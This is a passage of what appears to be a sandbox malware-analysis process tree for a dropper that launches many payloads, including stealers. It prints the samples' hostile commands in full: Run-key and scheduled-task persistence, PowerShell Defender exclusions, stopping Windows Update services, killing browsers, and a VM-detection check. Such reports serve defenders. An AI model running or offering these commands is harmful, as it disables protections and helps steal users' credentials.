        PID:10724
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        9⤵
        
        PID:10100
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        8⤵
        
        PID:8588
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        8⤵
        
        PID:9184
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\841E.tmp\841F.tmp\8420.bat C:\Windows\system32\java.exe"
        9⤵
        
        PID:7680
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        10⤵
        Delays execution with timeout.exe
        
        PID:10048
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        10⤵
        
        PID:10056
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        10⤵
        
        PID:5584
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        10⤵
        
        PID:6288
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        10⤵
        
        PID:4760
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        10⤵
        
        PID:7664
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        11⤵
        
        PID:10760
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        10⤵
        
        PID:11132
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        10⤵
        
        PID:9548
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9695.tmp\9696.tmp\9697.bat C:\Windows\system32\java.exe"
        11⤵
        
        PID:8720
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        12⤵
        Delays execution with timeout.exe
        
        PID:3692
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        12⤵
        
        PID:10616
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        12⤵
        
        PID:8440
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        12⤵
        
        PID:2524
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        12⤵
        
        PID:3812
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        12⤵
        Delays execution with timeout.exe
        
        PID:9900
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        10⤵
        Delays execution with timeout.exe
        
        PID:6164
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        8⤵
        Delays execution with timeout.exe
        
        PID:920
      - C:\Windows\system32\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:2376
  - - C:\Windows\system32\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:868
- C:\Users\Admin\AppData\Local\Temp\Files\valid.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\valid.exe"
  2⤵
  PID:5348
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\N2P23.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\N2P23.exe
    3⤵
    PID:7972
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Y9Q63.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Y9Q63.exe
      4⤵
      PID:9932
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Z45e8.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Z45e8.exe
        5⤵
        
        PID:5704
      - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        6⤵
        
        PID:9444
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2s3369.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2s3369.exe
        5⤵
        
        PID:3348
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3P43S.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3P43S.exe
      4⤵
      PID:7004
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4i221v.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4i221v.exe
    3⤵
    PID:5800
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:4892
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:3236
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:5768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:4960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:5368
- C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe"
  2⤵
  PID:10600
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:10008
- C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
  2⤵
  PID:8308
- C:\Users\Admin\AppData\Local\Temp\Files\a.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\a.exe"
  2⤵
  PID:9892
- - C:\Windows\sysvplervcs.exe
    C:\Windows\sysvplervcs.exe
    3⤵
    PID:9908
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      PID:4108
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10452
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
      4⤵
      PID:10348
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:4696
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:10260
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:8144
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        5⤵
        Launches sc.exe
        
        PID:8316
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        5⤵
        Launches sc.exe
        
        PID:7308
  - - C:\Users\Admin\AppData\Local\Temp\283741536.exe
      C:\Users\Admin\AppData\Local\Temp\283741536.exe
      4⤵
      PID:9640
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        5⤵
        
        PID:4468
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:7960
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        5⤵
        
        PID:3780
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:10852
  - - C:\Users\Admin\AppData\Local\Temp\784429963.exe
      C:\Users\Admin\AppData\Local\Temp\784429963.exe
      4⤵
      PID:9428
  - - C:\Users\Admin\AppData\Local\Temp\872623378.exe
      C:\Users\Admin\AppData\Local\Temp\872623378.exe
      4⤵
      PID:8316
- C:\Users\Admin\AppData\Local\Temp\Files\WenzCord.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WenzCord.exe"
  2⤵
  PID:7828
- - C:\Windows\system32\schtasks.exe
    "schtasks" /create /tn "Update.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\WenzCord.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:10596
- C:\Users\Admin\AppData\Local\Temp\Files\2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\2.exe"
  2⤵
  PID:7812
- - C:\Users\Admin\AppData\Local\Temp\sysklnorbcv.exe
    C:\Users\Admin\AppData\Local\Temp\sysklnorbcv.exe
    3⤵
    PID:9616
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      PID:1632
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1532
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
      4⤵
      PID:5492
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:6476
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:4360
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:3380
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        5⤵
        Launches sc.exe
        
        PID:6852
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        5⤵
        Launches sc.exe
        
        PID:6168
  - - C:\Users\Admin\AppData\Local\Temp\2476020639.exe
      C:\Users\Admin\AppData\Local\Temp\2476020639.exe
      4⤵
      PID:11080
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        5⤵
        
        PID:10572
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:980
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        5⤵
        
        PID:1784
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:5864
  - - C:\Users\Admin\AppData\Local\Temp\2576814871.exe
      C:\Users\Admin\AppData\Local\Temp\2576814871.exe
      4⤵
      PID:6232
- C:\Users\Admin\AppData\Local\Temp\Files\legas.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"
  2⤵
  PID:8844
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:6732
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:6756
  - - C:\Users\Admin\AppData\Roaming\mvTYdyZGiP.exe
      "C:\Users\Admin\AppData\Roaming\mvTYdyZGiP.exe"
      4⤵
      PID:6296
  - - C:\Users\Admin\AppData\Roaming\DkxRpT6Czt.exe
      "C:\Users\Admin\AppData\Roaming\DkxRpT6Czt.exe"
      4⤵
      PID:6316
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 8844 -s 60
    3⤵
    - Program crash
    PID:6828
- C:\Users\Admin\AppData\Local\Temp\Files\Microsoft.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Microsoft.exe"
  2⤵
  PID:9840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:3324
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:6508
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:1776
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:5508
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:11200
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:11056
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:7356
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:2204
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:3224
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:8008
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:3776
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:9172
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:3228
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:6676
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:3260
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:7340
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:9332
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:3200
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:4056
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:7708
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:5112
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
    3⤵
    PID:9632
- C:\Users\Admin\AppData\Local\Temp\Files\TripVPN.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\TripVPN.exe"
  2⤵
  PID:5184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fefb8d9758,0x7fefb8d9768,0x7fefb8d9778
  2⤵
  PID:2868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:2
  2⤵
  PID:2692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:8
  2⤵
  PID:2720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:8
  2⤵
  PID:2660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2300 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:1
  2⤵
  PID:2356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2312 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:1
  2⤵
  PID:2396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1372 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:2
  2⤵
  PID:2276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3312 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:1
  2⤵
  PID:964
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:2208
- - C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x13f827688,0x13f827698,0x13f8276a8
    3⤵
    PID:1128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:8
  2⤵
  PID:3004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3916 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:1
  2⤵
  PID:2364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3656 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:1408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3776 --field-trial-handle=1216,i,2440494335235192169,128654433289446438,131072 /prefetch:8
  2⤵
  PID:1048
- - C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
    "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
    3⤵
    PID:3016
  - - C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"
      4⤵
      PID:536
    - - C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"
        5⤵
        
        PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\Files\LgendPremium.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\LgendPremium.exe"
      4⤵
      PID:2288
  - - C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe"
      4⤵
      PID:2120
    - - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "
        5⤵
        
        PID:1044
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get Model
        6⤵
        
        PID:2388
      - C:\Windows\system32\findstr.exe
        
        findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
        6⤵
        
        PID:2304
  - - C:\Users\Admin\AppData\Local\Temp\Files\document.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\document.exe"
      4⤵
      PID:9232
  - - C:\Users\Admin\AppData\Local\Temp\Files\chicken123.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\chicken123.exe"
      4⤵
      PID:10220
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:6596
- - C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
    "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
    3⤵
    PID:1220
  - - C:\Users\Admin\AppData\Local\Temp\Files\MARRON.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\MARRON.exe"
      4⤵
      PID:2192
  - - C:\Users\Admin\AppData\Local\Temp\Files\11.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\11.exe"
      4⤵
      PID:236
    - - C:\Windows\sysarddrvs.exe
        
        C:\Windows\sysarddrvs.exe
        5⤵
        
        PID:3012
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        
        PID:1568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2520
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        6⤵
        
        PID:1532
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:1240
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:3104
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:3116
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        7⤵
        Launches sc.exe
        
        PID:3136
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        7⤵
        Launches sc.exe
        
        PID:3200
      - C:\Users\Admin\AppData\Local\Temp\3141620244.exe
        
        C:\Users\Admin\AppData\Local\Temp\3141620244.exe
        6⤵
        
        PID:5472
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:4424
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:4660
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:4728
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:4792
      - C:\Users\Admin\AppData\Local\Temp\2150815089.exe
        
        C:\Users\Admin\AppData\Local\Temp\2150815089.exe
        6⤵
        
        PID:5288
      - C:\Users\Admin\AppData\Local\Temp\1189310134.exe
        
        C:\Users\Admin\AppData\Local\Temp\1189310134.exe
        6⤵
        
        PID:3932
        
        C:\Users\Admin\AppData\Local\Temp\3913138852.exe
        
        C:\Users\Admin\AppData\Local\Temp\3913138852.exe
        7⤵
        
        PID:2568
  - - C:\Users\Admin\AppData\Local\Temp\Files\A.I_1003H.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\A.I_1003H.exe"
      4⤵
      PID:9924
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe"
        5⤵
        
        PID:7936
- - C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
    "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\Files\vlst.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\vlst.exe"
      4⤵
      PID:4888
  - - C:\Users\Admin\AppData\Local\Temp\Files\kill.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\kill.exe"
      4⤵
      PID:5056
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6108
  - - C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe
